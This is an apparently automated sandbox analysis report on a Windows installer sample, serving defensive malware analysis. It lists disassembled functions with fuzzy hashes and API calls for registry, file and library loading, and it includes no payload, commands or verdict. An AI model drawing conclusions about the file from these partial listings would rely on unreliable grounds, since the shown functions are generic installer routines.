                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 06a588dc36723823e64c1d76eb6b79df0e0f5c7b74692a20a357622d355e40c3
                                                                        • Instruction ID: bb31d40f455f6cff8f0b7d4569728449f81f985eb729d97d8cba9c35205a948c
                                                                        • Opcode Fuzzy Hash: 06a588dc36723823e64c1d76eb6b79df0e0f5c7b74692a20a357622d355e40c3
                                                                        • Instruction Fuzzy Hash: A6814471E04228CBDF24CFA8C844BADBBB1FF44305F25816AD456BB281C7789996DF44
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00406390 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 72aa8ec3dd0942b5b71c471d9b9626f4b4465e3dfbf4f8c787812f56ef585442
                                                                        • Instruction ID: e59bb743c0d69fedc8ec9c1b53f92d0ee49f9853fc7f4c6d73f4ee5c7875ed1f
                                                                        • Opcode Fuzzy Hash: 72aa8ec3dd0942b5b71c471d9b9626f4b4465e3dfbf4f8c787812f56ef585442
                                                                        • Instruction Fuzzy Hash: FE816671E04228DBDF24CFA8C8447ADBBB0FF44305F15816AD856BB281C7786996DF44
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004067DE Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1d7d6eeb6ae866c31b6fd6fb1bb683d5497ea3b6253a7880f6caf84b5ad72384
                                                                        • Instruction ID: 9556348457f1f5f1301c48e47fc8538a45dff02eab8277f34011f15b85b09a92
                                                                        • Opcode Fuzzy Hash: 1d7d6eeb6ae866c31b6fd6fb1bb683d5497ea3b6253a7880f6caf84b5ad72384
                                                                        • Instruction Fuzzy Hash: 43711271E00228DBDF28CF98C854BADBBB1FF48305F15806AD816BB281C7789996DF54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004068FC Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 55af2c983f537d9a3a53cfac4a449f3e0c8fe7d310f5448a54a9ff87f60f3244
                                                                        • Instruction ID: ef61438920200bd82941886013112b5956151ce3a95704f571d29bdd470ffe0d
                                                                        • Opcode Fuzzy Hash: 55af2c983f537d9a3a53cfac4a449f3e0c8fe7d310f5448a54a9ff87f60f3244
                                                                        • Instruction Fuzzy Hash: FF713571E00228DBDF28CF98C854BADBBB1FF44305F15806AD856BB291C7789996DF44
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00406848 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 720b16b0405195766e324cd34a7adf45238a3bda3f5e9f89198b3f7d2eee93b7
                                                                        • Instruction ID: 0528ad5c4640a45b82c18dce6d1929194436f5f2edf35a138e23b2c729619556
                                                                        • Opcode Fuzzy Hash: 720b16b0405195766e324cd34a7adf45238a3bda3f5e9f89198b3f7d2eee93b7
                                                                        • Instruction Fuzzy Hash: AD714671E00228DBDF28CF98C854BADBBB1FF44305F15806AD816BB291C778AA56DF44
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00401F98 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FC3
                                                                          • Part of subcall function 00405194: lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                          • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                          • Part of subcall function 00405194: lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00402D94), ref: 004051EF
                                                                          • Part of subcall function 00405194: SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll), ref: 00405201
                                                                          • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                          • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                          • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                        • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
                                                                        • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                        • String ID:
                                                                        • API String ID: 334405425-0
                                                                        • Opcode ID: dcaf5fe5b6a492e082c86e3308aef9d810de41946205d947a6f0ec063f202335
                                                                        • Instruction ID: 2e01ab74a4c934f7e6015694823d512690d69bb111ffb1ad89b514660c000c84
                                                                        • Opcode Fuzzy Hash: dcaf5fe5b6a492e082c86e3308aef9d810de41946205d947a6f0ec063f202335
                                                                        • Instruction Fuzzy Hash: 65219871904215F6CF106F95CE48ADEBAB4AB04358F70417BF601B51E0D7B94D41DA6D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00402454 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                        • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402483
                                                                        • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 00402496
                                                                        • RegCloseKey.KERNELBASE(?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: Enum$CloseOpenValue
                                                                        • String ID:
                                                                        • API String ID: 167947723-0
                                                                        • Opcode ID: 6e99734366527264dc840e925d7c94ad163712867fc654ceccd1d955a8cf1fe1
                                                                        • Instruction ID: d1cba53e09d25e0e4976289683f2ac1bdc9fdbf0613ee45d63c2eeb4b4bf5101
                                                                        • Opcode Fuzzy Hash: 6e99734366527264dc840e925d7c94ad163712867fc654ceccd1d955a8cf1fe1
                                                                        • Instruction Fuzzy Hash: 8AF0D1B1A04204AFEB148FA5DE88EBF767CEF40358F10483EF001A21C0D2B85D41DB2A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004023E0 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                        • RegQueryValueExW.ADVAPI32(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 00402411
                                                                        • RegCloseKey.KERNELBASE(?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: CloseOpenQueryValue
                                                                        • String ID:
                                                                        • API String ID: 3677997916-0
                                                                        • Opcode ID: 3948b4e194fc1ebc10074bac7def7f46b4b7044ecc38d79892a2d6fb8e81cb4c
                                                                        • Instruction ID: d36666ef43ed86f5efc63e353f879872970ea39244a0d469f35bb849977519d9
                                                                        • Opcode Fuzzy Hash: 3948b4e194fc1ebc10074bac7def7f46b4b7044ecc38d79892a2d6fb8e81cb4c
                                                                        • Instruction Fuzzy Hash: 3A117371915205EEDF14CFA0C6889AFB7B4EF40359F20843FE042A72D0D7B85A41DB5A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                        • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
                                                                        • Instruction ID: f7aa54b913f5ca68b4de92db4f2492a915771a0f44b2d9fd206d2c7cbab0d3a4
                                                                        • Opcode Fuzzy Hash: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
                                                                        • Instruction Fuzzy Hash: B501F431724210ABE7295B789C05B6A3698E720314F10853FF911F72F1DA78DC138B4D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004022D5 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F4
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 004022FD
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: CloseDeleteOpenValue
                                                                        • String ID:
                                                                        • API String ID: 849931509-0
                                                                        • Opcode ID: 7b30a92271470e741bedac9d47006af4ab5eeb306cb7f676dee8e085548db756
                                                                        • Instruction ID: f65991dd8835b810368ef95f62892a142216c4200c100bb05ab411dbf566f3c1
                                                                        • Opcode Fuzzy Hash: 7b30a92271470e741bedac9d47006af4ab5eeb306cb7f676dee8e085548db756
                                                                        • Instruction Fuzzy Hash: D5F06272A04210ABEB15AFF59A4EBAE7278DB04318F20453BF201B71D1D5FC5D028A6D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405B56 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\160420241245287.exe,80000000,00000003), ref: 00405B5A
                                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: File$AttributesCreate
                                                                        • String ID:
                                                                        • API String ID: 415043291-0
                                                                        • Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                                        • Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
                                                                        • Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                                        • Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405B31 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(?,?,00405736,?,?,00000000,0040590C,?,?,?,?), ref: 00405B36
                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405B4A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
